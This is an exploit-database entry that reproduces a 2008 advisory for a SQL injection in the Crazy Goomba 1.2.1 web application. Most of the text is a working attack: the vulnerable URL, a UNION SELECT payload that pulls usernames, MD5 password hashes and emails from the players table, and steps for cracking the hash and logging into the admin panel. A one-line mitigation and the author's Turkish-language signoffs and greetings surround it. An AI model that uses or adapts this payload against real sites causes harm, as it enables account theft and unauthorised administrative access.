header-logo
Suggest Exploit
vendor:
Crazy Goomba
by:
ZoRLu
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Crazy Goomba
Affected Version From: 1.2.2001
Affected Version To: 1.2.2001
Patch Exists: NO
Related CWE: N/A
CPE: a:z0rlu:crazy_goomba
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Crazy Goomba 1.2.1 SQL inj

An attacker can exploit a SQL injection vulnerability in Crazy Goomba 1.2.1 to gain access to the admin panel. By entering the following code in the [SQL] field, an attacker can gain access to the admin panel: 1'/**/union/**/select/**/0,pseudo,password,email,id,0,0/**/from/**/cg_joueurs/**. The attacker can then use the obtained credentials to log in to the admin panel at http://localhost/Crazy_Goomba_1.2.1_path/administration/admin.php.

Mitigation:

Input validation should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

##########CANAKKALE GECiLMEZ##############################

Crazy Goomba 1.2.1 SQL inj

dork:  :((  sory

author: ZoRLu 

home: ( http://www.z0rlu.ownspace.org ) ( yildirimordulari.org ) ( r00tsecurity.org ) ( securityfocus.com )

contact: trt-turk@hotmail.com & ZoRLu@w.cn ( baska msn yok taklitlerden kacInIn )

Not: msn i ekleyipte densiz densiz konusanIn sulalesini cumle alem .... La benden keylog isyetesiniz diye vermiyorum msn i. sacmalamayIn da  :((

Not: http://www.z0rlu.ownspace.org   acIklarýn kullanImI ile ilgili bilgiler blogumda mevcut! naparsIn para yokk free actIk :))

###################CANAKKALE GECiLMEZ###################

http://localhost/Crazy_Goomba_1.2.1_path/commentaires.php?id=[SQL]


[SQL]


1'/**/union/**/select/**/0,pseudo,password,email,id,0,0/**/from/**/cg_joueurs/**



( [SQL] yazan yere kodu yaz admin name, password(md5) ve email adresine ulas )

md5 i kýr ve giris yap

http://localhost/Crazy_Goomba_1.2.1_path/index.php?page=connexion  ( login )


sonra admin panele baglan


admin panel: 


http://localhost/Crazy_Goomba_1.2.1_path/administration/admin.php



###################CANAKKALE GECiLMEZ####################

thanx: str0ke, FaLCaTa, aRKi, the_KaM!L, ReD_KaN, iSoMiX, edish, harded, z3h!r, KoDLoK, Dr.SaLTuK, kasIrga(lavrens), w3R3m

avkidis, head_hunter and all users yildirimordulari.org & r00tsecurity.org

O Simdi Komando: iSoMiX ( CanImsIn Kardesim, KanKam Benim :))  )

Efsane: YILDIRIMORDULARI.ORG

Dersler BasladI Sanal Bitti  :(((

###################CANAKKALE GECiLMEZ####################

# milw0rm.com [2008-04-21]

Navigation

Suggest Exploit

Services By CQR